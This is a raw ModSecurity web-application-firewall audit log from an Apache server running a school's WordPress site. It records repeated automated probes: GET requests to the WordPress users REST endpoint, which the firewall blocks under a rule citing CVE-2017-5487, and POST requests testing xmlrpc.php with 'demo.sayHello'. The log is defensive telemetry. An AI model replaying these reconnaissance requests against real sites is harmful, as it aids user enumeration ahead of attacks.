Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe1bf7c-Z-- --3a5b2d08-A-- [11/May/2025:03:56:44 +0700] aB-9jApy530QiWmSS60aTAAAAEY 103.236.140.4 59780 103.236.140.4 8181 --3a5b2d08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a5b2d08-C-- demo.sayHello --3a5b2d08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a5b2d08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910604828490 6211 (- - -) Stopwatch2: 1746910604828490 6211; combined=4435, p1=594, p2=3598, p3=38, p4=42, p5=98, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a5b2d08-Z-- --0b163a56-A-- [11/May/2025:03:57:03 +0700] aB-9n08xOExV7lPH_Dlb1gAAANU 103.236.140.4 60250 103.236.140.4 8181 --0b163a56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b163a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b163a56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910623434473 14992 (- - -) Stopwatch2: 1746910623434473 14992; combined=25963, p1=426, p2=1000, p3=0, p4=0, p5=12283, sr=74, sw=0, l=0, gc=12254 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b163a56-Z-- --63704a7d-A-- [11/May/2025:03:57:11 +0700] aB-9pwpy530QiWmSS60aXgAAAFE 103.236.140.4 60458 103.236.140.4 8181 --63704a7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63704a7d-C-- demo.sayHello --63704a7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63704a7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910631072887 6846 (- - -) Stopwatch2: 1746910631072887 6846; combined=4994, p1=692, p2=4011, p3=42, p4=42, p5=133, sr=168, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63704a7d-Z-- --a1625658-A-- [11/May/2025:03:57:22 +0700] aB-9subs1CLLACKj-_yrFwAAAIQ 103.236.140.4 60834 103.236.140.4 8181 --a1625658-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a1625658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1625658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910642975330 3150 (- - -) Stopwatch2: 1746910642975330 3150; combined=1359, p1=432, p2=898, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1625658-Z-- --12f1a621-A-- [11/May/2025:03:57:34 +0700] aB-9vkEuxCpmyy5aJPlPrQAAAAo 103.236.140.4 32922 103.236.140.4 8181 --12f1a621-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12f1a621-C-- demo.sayHello --12f1a621-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f1a621-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910654605837 5598 (- - -) Stopwatch2: 1746910654605837 5598; combined=4304, p1=572, p2=3511, p3=31, p4=35, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f1a621-Z-- --d6f24616-A-- [11/May/2025:03:57:39 +0700] aB-9w0EuxCpmyy5aJPlPtQAAABQ 103.236.140.4 33102 103.236.140.4 8181 --d6f24616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6f24616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f24616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910659969207 2446 (- - -) Stopwatch2: 1746910659969207 2446; combined=1352, p1=497, p2=816, p3=0, p4=0, p5=38, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f24616-Z-- --ab6a3217-A-- [11/May/2025:03:57:46 +0700] aB-9yubs1CLLACKj-_yrOgAAAJg 103.236.140.4 33332 103.236.140.4 8181 --ab6a3217-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab6a3217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6a3217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910666488079 3252 (- - -) Stopwatch2: 1746910666488079 3252; combined=1545, p1=566, p2=949, p3=0, p4=0, p5=30, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6a3217-Z-- --367b6c04-A-- [11/May/2025:03:57:46 +0700] aB-9yubs1CLLACKj-_yrOwAAAJc 103.236.140.4 33334 103.236.140.4 8181 --367b6c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --367b6c04-C-- demo.sayHello --367b6c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --367b6c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910666519150 5915 (- - -) Stopwatch2: 1746910666519150 5915; combined=4344, p1=536, p2=3544, p3=41, p4=47, p5=103, sr=75, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --367b6c04-Z-- --af3f986b-A-- [11/May/2025:03:58:01 +0700] aB-92ebs1CLLACKj-_yrjwAAAIM 103.236.140.4 33700 103.236.140.4 8181 --af3f986b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af3f986b-C-- demo.sayHello --af3f986b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af3f986b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910681147516 5562 (- - -) Stopwatch2: 1746910681147516 5562; combined=3869, p1=528, p2=3140, p3=34, p4=35, p5=77, sr=94, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af3f986b-Z-- --2199915e-A-- [11/May/2025:04:02:03 +0700] aB--y-bs1CLLACKj-_ytmAAAAIQ 103.236.140.4 40252 103.236.140.4 8181 --2199915e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2199915e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2199915e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910923124940 2981 (- - -) Stopwatch2: 1746910923124940 2981; combined=1581, p1=509, p2=1032, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2199915e-Z-- --0a30f818-A-- [11/May/2025:04:02:12 +0700] aB--1Obs1CLLACKj-_ytpQAAAIY 103.236.140.4 40512 103.236.140.4 8181 --0a30f818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0a30f818-C-- demo.sayHello --0a30f818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a30f818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910932972852 6883 (- - -) Stopwatch2: 1746910932972852 6883; combined=5200, p1=701, p2=4276, p3=31, p4=38, p5=90, sr=122, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a30f818-Z-- --80b52f64-A-- [11/May/2025:04:37:03 +0700] aB_G_-bs1CLLACKj-_y-OgAAAIY 103.236.140.4 50956 103.236.140.4 8181 --80b52f64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80b52f64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80b52f64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913023850489 3486 (- - -) Stopwatch2: 1746913023850489 3486; combined=1548, p1=559, p2=952, p3=0, p4=0, p5=36, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80b52f64-Z-- --cfb49301-A-- [11/May/2025:04:37:08 +0700] aB_HBE8xOExV7lPH_DltoQAAANc 103.236.140.4 51096 103.236.140.4 8181 --cfb49301-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfb49301-C-- demo.sayHello --cfb49301-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfb49301-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913028151968 5875 (- - -) Stopwatch2: 1746913028151968 5875; combined=4306, p1=535, p2=3527, p3=35, p4=35, p5=111, sr=85, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfb49301-Z-- --14869644-A-- [11/May/2025:04:38:51 +0700] aB_Ha0EuxCpmyy5aJPlj2wAAABc 103.236.140.4 54420 103.236.140.4 8181 --14869644-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14869644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14869644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913131706685 2807 (- - -) Stopwatch2: 1746913131706685 2807; combined=1323, p1=406, p2=888, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14869644-Z-- --5098085c-A-- [11/May/2025:04:38:57 +0700] aB_HcUEuxCpmyy5aJPlj5wAAAA8 103.236.140.4 54600 103.236.140.4 8181 --5098085c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5098085c-C-- demo.sayHello --5098085c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5098085c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746913137183007 6247 (- - -) Stopwatch2: 1746913137183007 6247; combined=4548, p1=558, p2=3748, p3=31, p4=36, p5=102, sr=97, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5098085c-Z-- --0051c668-A-- [11/May/2025:04:40:57 +0700] aB_H6UEuxCpmyy5aJPllIgAAAA4 103.236.140.4 58794 103.236.140.4 8181 --0051c668-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0051c668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0051c668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746913257821824 2468 (- - -) Stopwatch2: 1746913257821824 2468; combined=1228, p1=451, p2=740, p3=0, p4=0, p5=36, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0051c668-Z-- --b1405c48-A-- [11/May/2025:04:41:07 +0700] aB_H8wpy530QiWmSS60viAAAAEo 103.236.140.4 59304 103.236.140.4 8181 --b1405c48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1405c48-C-- demo.sayHello --b1405c48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1405c48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 